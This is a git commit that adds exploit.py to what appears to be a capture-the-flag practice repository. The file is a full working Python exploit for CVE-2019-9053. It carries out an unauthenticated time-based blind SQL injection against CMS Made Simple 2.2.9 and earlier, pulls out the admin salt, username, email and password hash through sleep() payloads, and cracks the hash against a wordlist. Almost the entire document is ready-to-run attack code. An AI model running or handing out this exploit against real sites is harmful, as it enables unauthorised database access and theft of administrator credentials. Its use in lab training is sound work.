From 71dd1dc672fb230428ed3662f59b552eac70d215 Mon Sep 17 00:00:00 2001 From: Raghuram Subramani Date: Tue, 1 Mar 2022 14:47:08 +0530 Subject: add rooms --- SimpleCTF/exploit.py | 186 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 186 insertions(+) create mode 100644 SimpleCTF/exploit.py (limited to 'SimpleCTF/exploit.py') diff --git a/SimpleCTF/exploit.py b/SimpleCTF/exploit.py new file mode 100644 index 0000000..260e4e7 --- /dev/null +++ b/SimpleCTF/exploit.py @@ -0,0 +1,186 @@ +#!/usr/bin/env python3 +# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 +# Date: 30-03-2019 +# Exploit Author: Daniele Scanu @ Certimeter Group +# Vendor Homepage: https://www.cmsmadesimple.org/ +# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ +# Version: <= 2.2.9 +# Tested on: Ubuntu 18.04 LTS +# CVE : CVE-2019-9053 + +import requests +from termcolor import colored +import time +from termcolor import cprint +import optparse +import hashlib + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)") +parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") +parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False) + +options, args = parser.parse_args() +if not options.url: + print "[+] Specify an url target" + print "[+] Example usage (no cracking password): exploit.py -u http://target-uri" + print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist" + print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based." + exit() + +url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' +session = requests.Session() +dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' +flag = True +password = "" +temp_password = "" +TIME = 1 +db_name = "" +output = "" +email = "" + +salt = '' +wordlist = "" +if options.wordlist: + wordlist += options.wordlist + +def crack_password(): + global password + global output + global wordlist + global salt + dict = open(wordlist) + for line in dict.readlines(): + line = line.replace("\n", "") + beautify_print_try(line) + if hashlib.md5(str(salt) + line).hexdigest() == password: + output += "\n[+] Password cracked: " + line + break + dict.close() + +def beautify_print_try(value): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + cprint('[*] Try: ' + value, 'red', attrs=['bold']) + +def beautify_print(): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + +def dump_salt(): + global flag + global salt + global output + ord_salt = "" + ord_salt_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_salt = salt + dictionary[i] + ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_salt) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + salt = temp_salt + ord_salt = ord_salt_temp + flag = True + output += '\n[+] Salt for password found: ' + salt + +def dump_password(): + global flag + global password + global output + ord_password = "" + ord_password_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_password = password + dictionary[i] + ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_password) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users" + payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + password = temp_password + ord_password = ord_password_temp + flag = True + output += '\n[+] Password found: ' + password + +def dump_username(): + global flag + global db_name + global output + ord_db_name = "" + ord_db_name_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_db_name = db_name + dictionary[i] + ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_db_name) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + db_name = temp_db_name + ord_db_name = ord_db_name_temp + output += '\n[+] Username found: ' + db_name + flag = True + +def dump_email(): + global flag + global email + global output + ord_email = "" + ord_email_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_email = email + dictionary[i] + ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_email) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + email = temp_email + ord_email = ord_email_temp + output += '\n[+] Email found: ' + email + flag = True + +dump_salt() +dump_username() +dump_email() +dump_password() + +if options.cracking: + print colored("[*] Now try to crack password") + crack_password() + +beautify_print() \ No newline at end of file -- cgit v1.2.3